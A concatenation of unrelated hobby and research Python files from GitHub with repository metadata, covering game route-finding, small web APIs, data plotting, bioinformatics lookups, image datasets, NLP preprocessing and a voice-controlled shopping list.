elif con_type == SolarMap.WORMHOLE:
proceed = True
[_, _, wh_size, wh_life, wh_mass, time_elapsed] = con_info
if wh_size not in size_restriction:
proceed = False
elif ignore_eol and wh_life == 0:
proceed = False
elif ignore_masscrit and wh_mass == 0:
proceed = False
elif 0 < age_threshold < time_elapsed:
proceed = False
else:
proceed = False
if proceed:
parent[neighbor] = current_sys
visited.add(neighbor)
queue.append(neighbor)
return path
def shortest_path_weighted(
self,
source,
destination,
avoidance_list,
size_restriction,
security_prio,
ignore_eol,
ignore_masscrit,
age_threshold
):
path = []
size_restriction = set(size_restriction)
if source in self.systems_list and destination in self.systems_list:
if source == destination:
path = [source]
else:
priority_queue = []
visited = set([self.get_system(x) for x in avoidance_list])
distance = {}
parent = {}
# starting point
root = self.get_system(source)
distance[root] = 0
heapq.heappush(priority_queue, (distance[root], root))
while len(priority_queue) > 0:
(_, current_sys) = heapq.heappop(priority_queue)
visited.add(current_sys)
if current_sys.get_id() == destination:
# Found!
path.append(destination)
while True:
parent_id = parent[current_sys].get_id()
path.append(parent_id)
if parent_id != source:
current_sys = parent[current_sys]
else:
path.reverse()
return path
else:
# Keep searching
for neighbor in [x for x in current_sys.get_connections() if x not in visited]:
# Connection check (gate or wormhole size)
[con_type, con_info] = current_sys.get_weight(neighbor)
if con_type == SolarMap.GATE:
proceed = True
risk = security_prio[self.eve_db.system_type(neighbor.get_id())]
elif con_type == SolarMap.WORMHOLE:
proceed = True
risk = security_prio[3]
[_, _, wh_size, wh_life, wh_mass, time_elapsed] = con_info
if wh_size not in size_restriction:
proceed = False
elif ignore_eol and wh_life == 0:
proceed = False
elif ignore_masscrit and wh_mass == 0:
proceed = False
elif 0 < age_threshold < time_elapsed:
proceed = False
else:
proceed = False
if proceed:
if neighbor not in distance:
distance[neighbor] = float('inf')
if distance[neighbor] > distance[current_sys] + risk:
distance[neighbor] = distance[current_sys] + risk
heapq.heappush(priority_queue, (distance[neighbor], neighbor))
parent[neighbor] = current_sys
return path
| farshield/shortcircuit | src/shortcircuit/model/solarmap.py | solarmap.py | py | 8,726 | python | en | code | 56 | github-code | 6 | [
{
"api_name": "collections.deque",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "heapq.heappush",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "heapq.heappop",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "heapq.heappush",
... |
22759981162 | from fastapi import FastAPI
from fastapi.exceptions import RequestValidationError
from starlette.requests import Request
from starlette.responses import JSONResponse
from app import config as settings
from app.api.dependency import init_model
from app.api.v1.endpoint import router
from app.exceptions import APIException, APIExceptionErrorCodes, APIExceptionTypes
app = FastAPI(title=settings.PROJECT_NAME)
app.include_router(router)
@app.on_event("startup")
async def startup_event():
init_model()
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request: Request, exc: RequestValidationError) -> JSONResponse:
return JSONResponse(
status_code=APIExceptionErrorCodes.SCHEMA_ERROR[1],
content={
"error": {
"message": "schema error. please refer to data for details",
"type": APIExceptionTypes.DATA_VALIDATION,
"code": APIExceptionErrorCodes.SCHEMA_ERROR[0],
"data": exc.errors(),
}
},
)
@app.exception_handler(APIException)
async def api_exception_handler(request: Request, exc: APIException) -> JSONResponse:
return JSONResponse(status_code=exc.status_code, content=exc.get_exception_content().dict())
| SW13-Monstera/AI-server | app/main.py | main.py | py | 1,277 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "app.config.PROJECT_NAME",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "app.config",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "app.include_r... |
6767301700 | import json
from flask import Flask, request, Response
app = Flask(__name__)
required_fields = ['title', 'topics', 'ownerId', 'locationString']
tables = [
{
"tableId": 1,
"title": "TableC @ BostonHacks",
"topics": ["#masseffect", "#typescript", "#rickandmorty"],
"ownerId": 42,
"locationString": "Metcalf Hall, upstairs",
},
{
"tableId": 2,
"title": "Spline Reticulation",
"topics": ["#anything", "#anime"],
"ownerId": 69,
"locationString": "Sherman Gallery"
}
]
counter = 3
@app.route('/api/v1/tables', methods=['GET', 'POST'])
def table_resource():
if request.method == 'GET':
return Response(json.dumps(tables), mimetype='application/json')
elif request.method == 'POST':
return Response(insert_into_dict(request.json))
def insert_into_dict(new_table: dict):
in_fields = new_table.keys()
for field in required_fields:
if field not in in_fields:
return 400
global counter
new_table['tableId'] = counter
tables.append(new_table)
counter += 1
return 204
if __name__ == '__main__':
app.run('0.0.0.0', 8069, debug=True)
| shawnrc/hackascraps_bu17 | dummy_api.py | dummy_api.py | py | 1,198 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "flask.Response",
... |
30763371491 | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 28 13:39:19 2016
@author: Shahidur Rahman
"""
#import numpy as np;
#list declaration
#a_list = []
#b_list = []
#numpy array declaration
#left = np.array([])
#right = np.array([])
#convert the list to numpy array
#a = np.array(a_list)
#b = np.array(b_list)
#call the explorer library
import explorers
import stringRecorder
import pandas
from sqlalchemy import create_engine
import random
from mmh3 import hash128
i=0
#create sql connection
engine = create_engine('mysql+pymysql://root:shahidur_123@localhost:3306/mwt')
#open file and read
f = open(r"D:\Work\MWT\Data\VW_raw\rcv1.train.raw.txt")
try:
for line in f:
l=line.split("|")[0]
r=line.split("|")[1]
#a_list.append(l)
#b_list.append(r)
i=i+1
print(i)
#random number generator
epsilon = round(random.random(),3)
#print('\n'+'mwt : epsilon'+str(epsilon))
#unique key generation
unique_key =hash128('my string of doom ', seed=1234)
#print('mwt : unique_key '+str(unique_key))
#number of actions registered
noOfActions = 3
#print('mwt : noOfActions : '+str(noOfActions))
######################################################
#space for the policy action called
#to get the actionID for default policy
policyDecision = 3
#print('mwt : policyDecision : '+str(policyDecision))
scores = [1,2,3,4,5,6,7,8,9,10]
#for j in scores:
# print('mwt : scores : '+str(j))
######################################################
#print('mwt context : '+i)
callExplorer = explorers.explorers(epsilon,noOfActions,policyDecision,scores)
storeValues = callExplorer.algoSelection()
#print('storeValues : '+str(storeValues))
record = stringRecorder.stringRecorder(r, storeValues['actionID'], storeValues['actionProbability'], unique_key, storeValues['isExplore'], epsilon, noOfActions,policyDecision,storeValues['explorerAlgo'])
record=record.sewStrings()
#print('record : '+str(record))
#read data in data frame
#print('connection built')
colList="context,actionID,actionProbability,unique_key,isExplore,epsilon,noOfActions,policyDecision,explorerAlgo".split(',')
c1=['col1']
df = pandas.DataFrame(data=record,index=colList)
df=df.T
#print("printing panda df here")
#print(df)
#push data in sql
df.to_sql(con=engine, name='stringrecord', if_exists='append',index=False)
#close the opened file
finally:
f.close()
| skshahidur/nlp_paper_implementation | Word-Embedding/mwt.py | mwt.py | py | 2,843 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "mmh3.hash128",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "explorers.explore... |
2169470310 | import psycopg
from matplotlib import pyplot as plt
import numpy as np
import datetime
DB_NAME = "########"
DB_USER = "########"
DB_PASSWORD = "########"
conn = psycopg.connect(
dbname=DB_NAME,
user=DB_USER,
password=DB_PASSWORD)
def LoadQuery(fileName):
return open(f"tools/Queries/{fileName}.sql", "r").read()
def test_register_date_karma_hist(capsys):
registerDate = LoadQuery("registerDate")
registerDatePositiveKarma = LoadQuery("registerDatePositiveKarma")
registerDateZeroKarma = LoadQuery("registerDateZeroKarma")
registerDateNegativeKarma = LoadQuery("registerDateNegativeKarma")
with capsys.disabled():
with conn.cursor() as cur:
fig, ax1 = plt.subplots()
cur.execute(registerDate)
res = cur.fetchall()
y = np.array([t[0].timestamp() for t in res])
print(len(res))
years = [x for x in range(2006, 2025)]
plt.xticks(range(2006, 2025, 2))
hist_all = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
bottom = np.zeros(len(hist_all[0]))
cur.execute(registerDateNegativeKarma)
res = cur.fetchall()
y = np.array([t[0].timestamp() for t in res])
print(len(res))
hist_negative = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
hist_n = hist_negative[0]
ax1.bar(years[:-1], hist_n, width=np.diff(years), align="edge", color=(1,0,0,0.5), bottom=bottom)
bottom += hist_n
cur.execute(registerDatePositiveKarma)
res = cur.fetchall()
y = np.array([t[0].timestamp() for t in res])
print(len(res))
hist_positive = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
hist_p = hist_positive[0]
ax1.bar(years[:-1], hist_p, width=np.diff(years), align="edge", color=(0,1,0,0.5), bottom=bottom)
bottom += hist_p
cur.execute(registerDateZeroKarma)
res = cur.fetchall()
y = np.array([t[0].timestamp() for t in res])
print(len(res))
hist_zero = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
hist_z = hist_zero[0]
ax1.bar(years[:-1], hist_z, width=np.diff(years), align="edge", color=(0,0,1,0.5), bottom=bottom)
bottom += hist_z
ax1.bar(years[:-1], hist_all[0], width=np.diff(years), edgecolor="black", align="edge", color=(0,0,1,0))
fig.tight_layout()
plt.savefig(fname=f"./pics/analitics/register_date_karma_distr.png", bbox_inches='tight', dpi=200)
| AS2/habrolink | tools/Analitics/test_register_karma_hist.py | test_register_karma_hist.py | py | 2,940 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "psycopg.connect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "numpy.ar... |
42483897749 | import networkx as nx
def hierarchical_layout(G: nx.Graph) -> tuple:
"""Function to create dictionary with positions of nodes with hierarchical
arrangement.
Paramaters:
-----------
G: nx.Graph
NetworkX Graph object
Returns:
(int, int, dict)
Tuple with canvas size for the loan and non-loan, and a dictionary with
the node as key and the position as coordinate list or tuple
"""
# Record shortest distance between node pairs (to evaluate hierarchy levels)
spl = dict(nx.all_pairs_shortest_path_length(G))
# Count number of nodes for agg, sub1, sub2 levels
agg = []
sub1 = []
sub2 = []
for node in list(G.nodes()):
if spl['CA'][node] == 2:
agg.append(node)
elif spl['CA'][node] == 3:
sub1.append(node)
elif spl['CA'][node] == 4:
sub2.append(node)
# Attribute agg, sub1, sub2 containers to loan or non-loan
loan = []
non_loan = []
for node in list(G.nodes()):
if spl['01'][node] > spl['02'][node]:
non_loan.append(node)
else:
loan.append(node)
# Resize canvas based on how many nodes are present (loan)
largest_row_loan = max(
[
len([x for x in agg if x in loan]),
len([x for x in sub1 if x in loan]),
len([x for x in sub2 if x in loan]),
]
)
if largest_row_loan > 4:
canvas_loan_size = 0.25 * largest_row_loan
else:
canvas_loan_size = 1
# Resize canvas based on how many nodes are present (non-loan)
largest_row_nonloan = max(
[
len([x for x in agg if x in non_loan]),
len([x for x in sub1 if x in non_loan]),
len([x for x in sub2 if x in non_loan]),
]
)
print(f'Max row NON-LOAN: {largest_row_nonloan}')
if largest_row_nonloan > 4:
canvas_nonloan_size = 0.3 * largest_row_loan
else:
canvas_nonloan_size = 1
# Define canvas size for lower levels
canvas_loan_size_sub1 = canvas_loan_size / len([x for x in agg if x in loan])
canvas_loan_size_sub2 = canvas_loan_size / len([x for x in sub1 if x in loan])
canvas_nonloan_size_sub1 = canvas_nonloan_size / len([x for x in agg if x in non_loan])
canvas_nonloan_size_sub2 = canvas_nonloan_size / len([x for x in sub1 if x in non_loan])
# Assign x, y coordinates to nodes
agg_loan_iter = 0
agg_nonloan_iter = 0
position = {}
# CA, sections, and agg-fac
for node in list(G.nodes()):
if node == 'CA':
x, y = 0, 0.8
elif node == '01':
x, y = -0.5, 0.4
elif node == '02':
x, y = 0.5, 0.4
else:
if node in loan:
if node in agg:
x = - (0.5 + agg_loan_iter) * canvas_loan_size / len([x for x in agg if x in loan])
y = 0
agg_loan_iter += 1
elif node in non_loan:
if node in agg:
x = (0.5 + agg_nonloan_iter) * canvas_nonloan_size / len([x for x in agg if x in non_loan])
y = 0
agg_nonloan_iter += 1
position[node] = (x, y)
# sub-fac 1
for node in [x for x in agg if x in loan]:
sub1_loan_iter = 0
children = [y for y in G.neighbors(node) if y in sub1]
for child in children:
x0 = position[node][0]
x = (x0 + 0.5 * canvas_loan_size_sub1) - (0.5 + sub1_loan_iter) * canvas_loan_size_sub1 / len(children)
y = - 0.4
sub1_loan_iter += 1
position[child] = (x, y)
for node in [x for x in agg if x in non_loan]:
sub1_nonloan_iter = 0
children = [y for y in G.neighbors(node) if y in sub1]
for child in children:
x0 = position[node][0]
x = (x0 - 0.5 * canvas_nonloan_size_sub1) + (0.5 + sub1_nonloan_iter) * canvas_nonloan_size_sub1 / len(children)
y = - 0.4
sub1_nonloan_iter += 1
position[child] = (x, y)
# sub-fac 2
for node in [x for x in sub1 if x in loan]:
sub2_loan_iter = 0
children = [y for y in G.neighbors(node) if y in sub2]
for child in children:
x0 = position[node][0]
x = (x0 + 0.5 * canvas_loan_size_sub2) - (0.5 + sub2_loan_iter) * canvas_loan_size_sub2 / len(children)
y = - 0.8
sub2_loan_iter += 1
position[child] = (x, y)
for node in [x for x in sub1 if x in non_loan]:
sub2_nonloan_iter = 0
children = [y for y in G.neighbors(node) if y in sub2]
for child in children:
x0 = position[node][0]
x = (x0 - 0.5 * canvas_nonloan_size_sub2) + (0.5 + sub2_nonloan_iter) * canvas_nonloan_size_sub2 / len(children)
y = - 0.8
sub2_nonloan_iter += 1
position[child] = (x, y)
# if node in loan:
# if node in agg:
# x = - (0.5 + agg_loan_iter) * canvas_loan_size / len([x for x in agg if x in loan])
# y = 0
# agg_loan_iter += 1
# elif node in sub1:
# x = - (0.5 + sub1_loan_iter) * canvas_loan_size / len([x for x in sub1 if x in loan])
# y = -0.4
# sub1_loan_iter += 1
# elif node in sub2:
# x = - (0.5 + sub2_loan_iter) * canvas_loan_size / len([x for x in sub2 if x in loan])
# y = -0.8
# sub2_loan_iter += 1
# elif node in non_loan:
# if node in agg:
# x = (0.5 + agg_nonloan_iter) * canvas_nonloan_size / len([x for x in agg if x in non_loan])
# y = 0
# agg_nonloan_iter += 1
# elif node in sub1:
# x = (0.5 + sub1_nonloan_iter) * canvas_nonloan_size / len([x for x in sub1 if x in non_loan])
# y = -0.4
# sub1_nonloan_iter += 1
# elif node in sub2:
# x = (0.5 + sub2_nonloan_iter) * canvas_nonloan_size / len([x for x in sub2 if x in non_loan])
# y = -0.8
# sub2_nonloan_iter += 1
# position[node] = (x, y)
return canvas_loan_size, canvas_nonloan_size, position
| diegopintossi/graph_network | custom_hierarchical_layout.py | custom_hierarchical_layout.py | py | 6,468 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "networkx.Graph",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "networkx.all_pairs_shortest_path_length",
"line_number": 20,
"usage_type": "call"
}
] |
21998646716 | from typing import List
from collections import defaultdict
class Solution:
def countPairs(self, deliciousness: List[int]) -> int:
maxsum = max(deliciousness) * 2
pairs = 0
dd = defaultdict(int)
for i in deliciousness:
s = 1
while s <= maxsum:
count = dd[s - i]
pairs += count
s <<= 1
dd[s - i] += 1
return pairs % 1000000007
| hangwudy/leetcode | 1700-1799/1711. 大餐计数.py | 1711. 大餐计数.py | py | 456 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "collections.defaultdict",
"line_number": 9,
"usage_type": "call"
}
] |
39672826344 | import protocol
import pytest
class TestBitstream:
@pytest.mark.parametrize(
"s,val",
[
("", []),
("1", [0x10000000]),
("01", [0x01000000]),
("0102", [0x01020000]),
("0102030405", [0x01020304, 0x05000000]),
],
)
def test_from_string(self, s, val):
bs = protocol.Bitstream.from_string(s)
assert bs._data == val
@pytest.mark.parametrize(
"data,num,val",
[
([], 0, 0),
([0xA0000000], 1, 1),
([0xA0000000], 2, 2),
([0x00000001], 32, 1),
([0x00000001, 0x80000000], 33, 3),
],
)
def test_get_bits(self, data, num, val):
bs = protocol.Bitstream(data)
assert bs.get_bits(num) == val
@pytest.mark.parametrize(
"data,num,val",
[
([0x12340000], [2, 2, 4, 8], [0, 1, 2, 0x34]),
],
)
def test_get_bits_multiple(self, data, num, val):
bs = protocol.Bitstream(data)
for i in range(len(num)):
assert bs.get_bits(num[i]) == val[i]
class TestProtocol:
def test_read_packet(self):
bs = protocol.Bitstream.from_string("D2FE28")
p = protocol.Parser(bs)
assert p.read_version() == 6
assert p.read_type() == 4
assert p.read_literal() == (2021, 15)
| cmatsuoka/aoc | 2021 - submarine/16 - bitstream protocol/test_protocol.py | test_protocol.py | py | 1,376 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "protocol.Bitstream.from_string",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "protocol.Bitstream",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 7,
"usage_type": "call"
},
{
"api... |
2311755172 | import logging
import pathlib
import requests
import os
from pathlib import Path
from typing import Dict
from PIL.Image import Image
from result import Result, Ok, Err, Some
from definitions import EXT_API_SAVE_QUOTE_URL, EXT_API_OUTPUT_URL
from models import ImRequest
_logger = logging.getLogger(__name__)
class QuoteImUtils:
@staticmethod
def parse_req_dict( some_dict: Dict ) -> ImRequest:
try:
errs, validated = ImRequest.parser(some_dict)
validated.errs = errs
return validated
except Exception as err:
_logger.error( err, exc_info=True )
im_req = ImRequest()
im_req.errs = [err]
return im_req
@staticmethod
def send_to_ext_api( filename: str , filepath: str, default_url: str ) -> Result[str, Exception]:
s_key: str = os.environ['API_SECRET_KEY']
s_value: str = os.environ['API_SECRET_VAL']
url = f'{EXT_API_SAVE_QUOTE_URL}?{s_key}={s_value}'
try:
with open( filepath, 'rb' ) as im_file:
from PIL import Image as Im
payload={}
files=[( 'quote', (filename , im_file, 'image/png') )]
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
}
response = requests.post( url, headers=headers, data=payload, files=files)
if response and response.status_code == 200:
im_url: str = f'{EXT_API_OUTPUT_URL}/{filename}'
return Ok( im_url )
else:
_logger.warn( response.headers )
_logger.warn( response.text )
_logger.warn( f'"{url}"' )
im_url: str = f'{EXT_API_OUTPUT_URL}/default.png'
return Some(default_url)
except Exception as err:
_logger.error(err, exc_info=True)
return Err(err)
@staticmethod
def save_im_as( img: Image, filename: str , filepath: str ) -> Result[None, Exception]:
keep_alpha: bool = False
if img is None:
return Err( ValueError('Image is None') )
try:
file_extension = pathlib.Path(filename).suffix
keep_alpha = file_extension == '.png' or file_extension == '.PNG'
except Exception:
keep_alpha = False
try:
im_clone = img
if not keep_alpha:
im_clone = im_clone.convert('RGB')
im_clone.save( filepath )
return Ok( None )
except Exception as err:
_logger.error( err, exc_info=True )
return Err( err )
@staticmethod
def save_im_as_b64( filename: str , filepath: str, default_url: str ):
pass
@staticmethod
def send_to_ext_api_b64( filename: str , filepath: str, default_url: str ):
(800,600)
@staticmethod
def img_already_exists_ext_api( filename: str ) -> bool:
url: str = f'{EXT_API_OUTPUT_URL}/{filename}'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
}
try:
response = requests.get( url, headers=headers )
return response.status_code == 200
except Exception as err:
_logger.error(err)
return False
@staticmethod
def img_already_exists_local( filepath: str ) -> bool:
path = Path(filepath)
return path.is_file()
| lcapuano-app/quote-image-generator | src/imquote/qt_im_utils.py | qt_im_utils.py | py | 3,700 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "typing.Dict",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "models.ImRequest.parser",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "models.ImReques... |
43972979596 | import argparse
import re
# CPT tools
from wp_tools import CPTLink
def parse_inputs(text,file,galaxy_mode=False):
"""
Parses the inputs of a text box and new line separated pacc file
"""
accs = []
if text:
if re.search(("__cn__"),str(text[0])):
acc = text[0]
split = acc.split("__cn__")
accs.extend(split)
else:
accs.extend(text)
if file:
a = open(file.name).read().splitlines()
accs.extend(a)
if not accs:
raise Exception("No accessions used, check file and input.")
else:
return accs
def parse_email(email):
"""
Parses user input email and appends CPT Admins to NCBI email
"""
ADMINS = ["curtisross@tamu.edu","cory.maughmer@tamu.edu","anthonyc@tamu.edu"]
sep = ';'
try:
if "__at__" in email:
split = email.split("__at__")
email = f"{split[0]}@{split[1]}"
except TypeError:
raise Exception("Please Insert Email Address")
ADMINS.insert(0,email)
emails = sep.join(ADMINS)
return emails
def write_table(list_of_data, file):
"""
writes output table, uses list of data from CPTlink output
"""
with file as f:
f.write(f"WP_accession\tGenome_accession\tTaxID\tOrganism\tWP_count\n")
for acc in list_of_data:
for gacc_data in acc[1]:
f.write(f"{acc[0]}\t{gacc_data[0]}\t{gacc_data[1]}\t{gacc_data[2]}\t{acc[2]}\n")
def write_gaccs(list_of_data, file):
"""
writes output gacc file, uses list of data from CPTlink output
"""
for acc in list_of_data:
print(acc)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Retrieve information from a WP accession"
)
parser.add_argument(
"--wp_text",
nargs="*",
help="WP accessions, separated by __cn__ for Galaxy, or space for offline"
)
parser.add_argument(
"--wp_file",
type=argparse.FileType("r"),
help="New line separated WP accessions file"
)
parser.add_argument(
"--api_key",
help="NCBI API Key"
)
parser.add_argument(
"--email",
type=str,
help="Entrez requires an email to connect to NCBI database. CPT Admin emails will be appended to list."
)
parser.add_argument(
"--wp_amt",
dest='wp_amt',
choices=('first','all'),
default='first',
)
parser.add_argument(
"--out_table",
type=argparse.FileType("w"),
default="_return_table.txt",
help="Output table consisting of accession data"
)
args = parser.parse_args()
# Get accessions from input file and/or text
accs = parse_inputs(args.wp_text,args.wp_file)
# Emails
emails = parse_email(args.email)
# Run functions
package = {
"email" : emails,
"db" : "nuccore",
"dbfrom" : "protein",
"api_key" : args.api_key,
}
wps = []
for acc in accs:
package["acc"] = acc
if args.wp_amt == 'all': # sorta a hacky way to check and see if we're grabbing first or all
wp_all = True
else:
wp_all = False
pacc, gacc, wp_amt = CPTLink(**package).map_accessions(wp_all)
current_wp = [pacc,gacc,wp_amt]
wps.append(current_wp)
write_table(wps,args.out_table)
| TAMU-CPT/galaxy-tools | tools/wp_analysis/wp_data.py | wp_data.py | py | 3,447 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "re.search",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "argparse.FileType... |
20844744315 | import os
import random
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
class Images(Dataset):
def __init__(self, folder, size, is_training, downsample=False, preload=False):
"""
I assume that all images in the
folder have size at least `size`.
Arguments:
folder: a string, the path to a folder with images.
size: an integer.
is_training: a boolean.
downsample: a boolean.
preload: a boolean.
"""
self.names = os.listdir(folder)
self.folder = folder
self.downsample = downsample
self.preload = preload
self.size = size
if is_training:
self.transform = transforms.Compose([
transforms.RandomCrop(size),
transforms.RandomVerticalFlip(),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()
])
else:
self.transform = transforms.Compose([
transforms.CenterCrop(size),
transforms.ToTensor()
])
if preload:
# load all images into the memory
self.images = []
for i in range(len(self)):
image = self.load(i)
self.images.append(image)
def __len__(self):
return len(self.names)
def __getitem__(self, i):
"""
Returns:
a float tensor with shape [3, size, size].
It represents a RGB image with
pixel values in [0, 1] range.
"""
image = self.images[i] if self.preload else self.load(i)
if self.downsample:
r = random.choice([1, 2, 3])
w, h = image.size
w, h = w // r, h // r
if r > 1 and w >= self.size and h >= self.size:
image = image.resize((w, h), Image.LANCZOS)
return self.transform(image)
def load(self, i):
name = self.names[i]
path = os.path.join(self.folder, name)
image = Image.open(path).convert('RGB')
return image
| TropComplique/SRFeat-pytorch | input_pipeline.py | input_pipeline.py | py | 2,160 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tor... |
31406415884 | '''
Emily Lee
SoftDev1 pd6
K#25 -- Getting More REST
2018-11-15
'''
import json
import urllib.request
from flask import Flask,render_template
app=Flask(__name__)
@app.route("/")
def Hello_world():
url_stub="http://www.asterank.com/api/skymorph/search?target="
target="J99TS7A"
req=urllib.request.urlopen(url_stub+target)
fin=json.loads(req.read())
key=fin["results"][0]["key"]
url_stub="http://www.asterank.com/api/skymorph/image?key="
return render_template("index.html",
url=url_stub+key)
if __name__=="__main__":
app.debug=True
app.run()
| ecrystale/leeE | 25_rest/app.py | app.py | py | 628 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib.request.request.urlopen",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name":... |
23308286546 | import stanza
from headline_retriever import load_articles, collect_articles, save_articles
from textblob import TextBlob
from datetime import date
NLP = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos,lemma,ner')
END_DATE = date(2020, 3, 27) # the chosen last day to retrieve article headlines
# in place modification of a list of article dictionaries
def pre_process(articles):
for article in articles:
headline = article['headline']
sentiment = TextBlob(headline).sentiment
# print("sentiment:", sentiment)
sentiment_polarity = sentiment[0] # range from -1 to 1. -1 being the most negative, 1 being the most positive
sentiment_subjectivity = sentiment[1] # range from 0 to 1. 0 being factual, 1 being an opinion
processed_headline = NLP(headline)
words = []
lemmas = []
pos = []
entities = processed_headline.entities
entity_dicts = []
for entity in entities:
entity_dict = dict()
entity_dict['text'] = entity.text
entity_dict['type'] = entity.type
entity_dict['start_char'] = entity.start_char
entity_dict['end_char'] = entity.end_char
entity_dicts.append(entity_dict)
for sentence in processed_headline.sentences:
for word in sentence.words:
words.append(word.text)
lemmas.append(word.lemma)
pos.append(word.pos)
article['sentiment_polarity'] = sentiment_polarity
article['sentiment_subjectivity'] = sentiment_subjectivity
article['words'] = words
article['lemmas'] = lemmas
article['pos'] = pos
article['entities'] = entity_dicts
def average_sentiments(preprocessed_articles):
if len(preprocessed_articles) < 1:
print("avg polarity:", 0)
print("avg subjectivity:", 0)
return
total_subjectivity = 0
total_polarity = 0
for article in preprocessed_articles:
total_polarity += article['sentiment_polarity']
total_subjectivity += article['sentiment_subjectivity']
print("avg polarity:", total_polarity/len(preprocessed_articles))
print("avg subjectivity:", total_subjectivity/len(preprocessed_articles))
def average_words_per_headline(preprocessed_articles):
total_words = 0
for article in preprocessed_articles:
total_words += len(article['headline'].split())
print("avg words:", total_words/len(preprocessed_articles))
if __name__ == "__main__":
pass
#Example commands contained below:
# attempt to load in the article data if it exists
# fox_articles = load_articles("foxnews_headlines")
# msnbc_articles = load_articles("msnbc_headlines")
# pre_process(fox_articles)
# pre_process(msnbc_articles)
# save the retrieved article data
# save_articles("foxnews_pre_processed", fox_articles)
# save_articles("msnbc_pre_processed", msnbc_articles)
| NoahBlume/nlp_project | pre_processor.py | pre_processor.py | py | 2,997 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "stanza.Pipeline",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
"line_number": 16,
"usage_type": "call"
}
] |
15826756401 | import pandas, main
from db import db
from config import Style
def add_item_to_list():
while True:
conn = db.create_connection()
cursor = conn.cursor()
main.speak("What is the name of the Item?")
ITEM = main.listen().capitalize()
main.speak("What is the category of the item?")
CATEGORY = main.listen().capitalize()
cursor.execute(f"INSERT INTO shopping_list (Item, Category) VALUES ('{ITEM}', '{CATEGORY}');")
conn.commit()
print(f"Item added to list.")
main.speak("Item added to shopping list.")
main.speak("Would you like to add another item?")
run_again = main.listen().lower()
while run_again not in ("yes", "no"):
main.speak("Please say yes or no.")
main.speak("Would you like to add another item?")
run_again = main.listen().lower()
if run_again == "yes":
add_item_to_list()
elif run_again == "no":
break
def update_item_in_list():
while True:
conn = db.create_connection()
cursor = conn.cursor()
print(pandas.read_sql_query("SELECT * from shopping_list", conn))
shop = cursor.execute("SELECT * from shopping_list;")
for item in shop:
main.speak(f"Item ID: {item[0]} Item: {item[1]}")
main.speak("What is the I.D. of the item?")
update_item = main.listen()
cursor.execute(f"SELECT * FROM shopping_list WHERE ItemID = {update_item};")
result = cursor.fetchall()
main.speak("Would you like to update the Item or the Category?")
x = main.listen().upper()
while x not in ('ITEM', 'CATEGORY'):
main.speak("Please state if you would like to update the Item or the Category.")
print("Please select 'ITEM' or 'CATEGORY'")
x = main.listen().upper()
if x == "ITEM":
